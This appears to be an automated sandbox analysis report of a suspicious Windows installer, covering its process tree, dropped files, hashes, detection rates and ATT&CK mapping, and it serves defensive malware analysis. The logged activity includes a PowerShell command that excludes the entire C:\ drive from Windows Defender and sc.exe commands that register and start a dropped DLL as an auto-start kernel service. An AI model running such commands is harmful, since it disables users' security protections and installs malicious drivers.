Source: svchost.exe, 00000001.00000002.1611745576.000001610266E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000001.00000002.1610362591.000001610262B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000001.00000002.1611745576.000001610266E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:P
Source: svchost.exe, 00000001.00000002.1610362591.0000016102642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.1605599206.000002A4FBA31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C793886 NtSetInformationThread 00000000,00000011,00000000,00000000 11_2_6C793886
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C9206F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_6C9206F1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00AF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 17_2_00AF57D0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C91F6ED mov eax, dword ptr fs:[00000030h] 11_2_6C91F6ED
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C92A2A5 mov eax, dword ptr fs:[00000030h] 11_2_6C92A2A5
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C92A2D6 mov eax, dword ptr fs:[00000030h] 11_2_6C92A2D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C91922D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_6C91922D

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.19.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C9E7700 cpuid
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A7AB2A GetSystemTimeAsFileTime
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00B10090 GetVersion

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
Source: svchost.exe, 00000003.00000002.1606205609.0000020511702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
MITRE ATT&CK Matrix (one tactic per column; the number in parentheses is the count shown next to the technique in the report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (2) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Native API (1) | Windows Service (11) | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | File and Directory Discovery (3) | Remote Desktop Protocol | Data from Removable Media | Non-Application Layer Protocol (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Logon Script (Windows) | Windows Service (11) | Obfuscated Files or Information (3) | Security Account Manager | System Information Discovery (36) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Service Execution (1) | Login Hook | Process Injection (111) | Software Packing (1) | NTDS | Security Software Discovery (461) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Virtualization/Sandbox Evasion (251) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (11) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (251) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (1) | Proc Filesystem | System Owner/User Discovery (2) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (111) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1580393 | Sample: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Startdate: 24/12/2024 | Architecture: WINDOWS | Score: 92

Behavior graph (rendered in the report as an image; the process tree, dropped files and signature annotations recoverable from it):

• Root node signatures: Multi AV Scanner detection for dropped file; Found driver which could be used to inject code into processes; PE file contains section with special chars; 2 other signatures. DNS: time.windows.com
• #U5b89#U88c5#U52a9#U624b2.0.5.exe: drops C:\...\#U5b89#U88c5#U52a9#U624b2.0.5.tmp (PE32) and starts it
• #U5b89#U88c5#U52a9#U624b2.0.5.tmp (first instance): drops C:\Users\user\AppData\Local\...\update.vac (PE32) and C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); signature: Adds a directory exclusion to Windows Defender; starts #U5b89#U88c5#U52a9#U624b2.0.5.exe (second instance) and powershell.exe
• powershell.exe: signature: Loading BitLocker PowerShell Module; starts conhost.exe and WmiPrvSE.exe
• #U5b89#U88c5#U52a9#U624b2.0.5.exe (second instance): drops C:\...\#U5b89#U88c5#U52a9#U624b2.0.5.tmp (PE32) and starts it
• #U5b89#U88c5#U52a9#U624b2.0.5.tmp (second instance): drops C:\Users\user\AppData\Local\...\update.vac (PE32), C:\Program Files (x86)\Windows NT\hrsw.vbc (PE32), C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+) and C:\Program Files (x86)\Windows NT\7zr.exe (PE32); signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger; starts 7zr.exe twice
• 7zr.exe: drops C:\Program Files (x86)\...\tProtect.dll (PE32+); each instance starts conhost.exe
• svchost.exe: signature: Changes security center settings (notifications, updates, antivirus, firewall)
• cmd.exe and 30 other processes: start sc.exe (several instances, each with its own conhost.exe)

Source | Detection | Scanner | Label | Link
#U5b89#U88c5#U52a9#U624b2.0.5.exe | 0% | ReversingLabs
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc | 24% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vac | 24% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vac | 24% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
time.windows.com | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b2.0.5.exe | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.0000000003590000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000000.1280165742.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000000.1383564167.0000000000C8D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.0000000003590000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000000.1280165742.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000000.1383564167.0000000000C8D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.dr | false | | high
          No contacted IP infos
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1580393
          Start date and time:2024-12-24 13:12:07 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 11m 5s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:98
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Critical Process Termination
          Sample name:#U5b89#U88c5#U52a9#U624b2.0.5.exe
          renamed because original name is a hash value
          Original Sample Name:2.0.5.exe
          Detection:MAL
          Classification:mal92.evad.winEXE@129/33@1/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 77%
          • Number of executed functions: 28
          • Number of non-executed functions: 75
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 40.81.94.65, 13.107.246.63, 20.12.23.50
          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b2.0.5.exe
          No simulations
          No context
          No context
          No context
          No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.2.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.3.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.1.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.6.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.7.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.4.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.2.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.3.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.1.exe | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
File Type: data
Category: dropped
Size (bytes): 1839696
Entropy (8bit): 7.999886083195026
Encrypted: true
SSDEEP: 49152:xtf/Ncq8cVEEhPBMp8NcD8GROsSzBltnw7sK:xtCILNcD8GgsSzXtnw7T
MD5: AEE77D886C26E516786EDF2DEABC2A7E
SHA1: 5803AA2C3A033DB5C923C69AA51B24B54A0A88FB
SHA-256: F804B51355D79AD91AE47B2AFA19B7FC39931DE06103D14CE3924BD197CEDCE6
SHA-512: F6F9AEB2B604D7CF73B8C2AA8100D7B4F49B6D6F002B1178CDC0CAAC3F6C850CCF82515017CBCFD412E390AB0E3AEE313F48074BEDD534F33DF7E1B4E676BB6C
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3606016
Entropy (8bit): 7.0063494494702985
Encrypted: false
SSDEEP: 49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
MD5: 95ACD5631A9131DB1FD066565AFC9A67
SHA1: 8E9473BD632FF0F57FC34EECAC17174341D80D94
SHA-256: EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
SHA-512: 70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 24%
Process: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
File Type: data
Category: dropped
Size (bytes): 1589569
Entropy (8bit): 7.999901863430879
Encrypted: true
SSDEEP: 24576:v5v7d85bpwCIcOT5hc2Qe4Uz9ba8VcpMvl1JdrYdVUtuj8rGucZ+0LsX1VHqQZf8:BvGXwaOdaUzMGLAiRh7KQ5tpoR
MD5: 77F6ED0F9554EA74050C5A8FDB365A30
SHA1: 84111F13FB1AB25E61BD88FF0A7C4B61C40E2C8E
SHA-256: 524961C6D57B298D6AE7B621D54C5C61C0646095C2C4D733C62A8A0D34EE7443
SHA-512: 7B106EE9262D47C5CDB989D091842733BE6B2A5BE4230A95A6F52969CCECE7B33255FFCD5492563A00F8E408D376078AAF45DE5653CC6766C73070EA169021F4
Malicious: false
